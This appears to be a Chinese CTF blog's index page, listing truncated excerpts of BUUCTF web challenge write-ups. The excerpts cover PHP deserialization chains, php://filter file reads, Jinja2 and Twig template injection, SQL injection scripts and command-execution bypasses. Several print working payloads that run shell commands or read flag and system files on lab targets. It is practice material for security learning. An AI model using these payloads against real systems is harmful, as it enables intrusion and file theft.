CyhDl666的博客

文章目录题目源码魔术方法wakeuptostringinvokeget构造pop链题目源码pop链的构造题目源码 <?php//flag is in flag.phpclass Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append(

进入页面,让你在woofers和meowers中选择一个点击woofer是给一张狗狗的图片,meowers是一张猫猫的图片关键点在于urlhttp://8a506345-44e3-4d0e-821d-ed711c30f04b.node3.buuoj.cn/index.php?category=meowersget方式传参了meowers,得到了猫猫的图片那么这里是否能去读取一些文件呢？category=php://filter/convert.base64-encode/resource.

给了源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['source'])) { highlight.

文章目录解法一 %0A截断解法二：PHP利用PCRE回溯次数限制绕过某些安全限制进入页面要求用json的格式上传命令解法一 %0A截断{"cmd":"ls"}尝试cat 读取源码 发现被禁止了尝试%0A绕过cmd={%0A"cmd":"/bin/cat ../../../home/rceservice/flag"%0A}写下自己的疑惑和解答先把源码附上<?phpputenv('PATH=/home/rceservice/jail');if (isset($_R

文章目录正式解题解法一解法二 昨天的题目 今天来写笔记我已经习惯用Arjun工具去扫描参数了…其实这道题F12有提示是get传参 参数为searchtplmap一把梭 失败正式解题解法一工具失败就开始手工注入吧{{[].__class__.__base__.__subclasses__()}}爆出类[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type '

sql注入的布尔盲注 过滤了空格直接交expimport requestsurl = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"flag = ""def colounm(): for i in range(1,50): for j in payload: .

题目源码<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }.

题目给的源码@app.route('/getUrl', methods=['GET', 'POST'])def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(url)) host = part.

Twig SSTI模板注入和前面做的jinja2有点不同，学习一下SSTI模板注入 Twig重点内容在getFilter()方法中的874行上有对危险函数call_user_func的调用。如果我们能够控制这个参数，就可以用它来调用任意的PHP函数。public function getFilter($name){ [snip] foreach ($this->filterCallbacks as $callback) { if (fals.

一开始没有啥思路抓了个包 发现可以传参 再结合报错 这里应该是可以利用函数的返回的index.php源代码$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_repl.

dirsearch扫描目录git泄露 我githack出猫病了 ！得到两个文件flag.php<?php$flag = file_get_contents('/flag');index.php<?phpinclude 'flag.php';$yds = "dog";$is = "cat";$handsome = 'yds';foreach($_POST as $x => $y){ $$x = $y;}foreach($_GET as $x =.

进入网站直接贴了源码<title>Check_In</title><?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.

进入页面用arjun扫描一下有什么url参数这道题是最基础的了直接给payload前面的payload吧{{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}}页面返回：password is wrong: app bin boot dev etc home lib lib64 media m.

题目已经告诉是SSTI模板注入了测试一下做题时用""发现了过滤 fuzz一下过滤了很多东西想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换附上自己写的python脚本code = "/proc/self/fd/1"ssti = ""length = len(code)for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:]print(ssti)将下面内容转化为16进制__class__.

文章目录手注tplmap手注刚进入题目 知道是SSTI注入 但是没找到注入点学到了一个新的工具 Arjun扫描到get参数name?name={{'aaa'.upper()}}确定是SSTI注入构造payload：{% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en

文件读取和session伪造发现购买flag的钱差1元其实大概就是这样，我们距离我们最想得到的就差那么一丢丢,买不了flag我们可以买蜂蜜嘛…进入正题题目有个提示click to download our sweet images大概题目的切入点就是这个 下载的时候抓个包发现/download?image=2.jpg,发现download目录,我们就可以尝试一下能不能去获取其他有用的信息可以读取到其他有用的信息昨天做题的时候做到了Linux下的一个文件复习一下Linux下.

进入题目给了两个页面一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式接着尝试了热点列表页面的注入 但是url上好像不存在注入F12在net中找到了隐藏的url访问content_detail.php?id=1页面构造payload?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()## admin、co.

看到login和register界面 第一个想法就是二次注入但是我看到了change password想到了以前做过的一道题目尝试一了一下越权修改密码发现不行继续尝试二次注入吧在register.php页面注册账号用户名：root密码:123email:123登录成功后 点击chage password页面修改密码发现报错猜测一下执行的语句select * from user where username ="root\" and pwd='65c94593b88237.

dirsearch扫描发现index.php.swp文件 给了源码<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$char.

访问robots.txt,得到hint.php,得到sql注入的源码select * from users where username='$_POST["username"]' and password='$_POST["password"]';一开始尝试了一些'闭合okkk!'被过滤了那就从这个sql语句入手想想办法记得以前学过一个addslashes()函数利用\去转义,看看效果select * from users where username='123\' and pass.

12345都点过了 访问id=6 提示Clever! But not this table.这里猜测id这里存在SQL注入,而不是以前的登录框初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下空格被过滤掉了用() union注入这些也被过滤的差不都了FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿^没有被过滤 可以在这里去搞点事情做做题目有提示是盲注 所以这种题目还是跑脚本import requestsimport sysimport timedef g.

审计一下源码,稍微加了一些注释#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert.

PHP 的SSTI模板注入进去你看到了一个唯美的页面你会情不自禁的去点Flag它告诉你你的IP地址 不过好像不是我的IP地址吧接着就点了HINT查看源码 什么都没发现 看了wp发现古怪在X-Forwarded-For抓个包 添加 X-Forwarded-For: {{127.0.0.1}}学着python的模板注入 瞎搞了几下{system("ls /")}{system("cat /flag")}...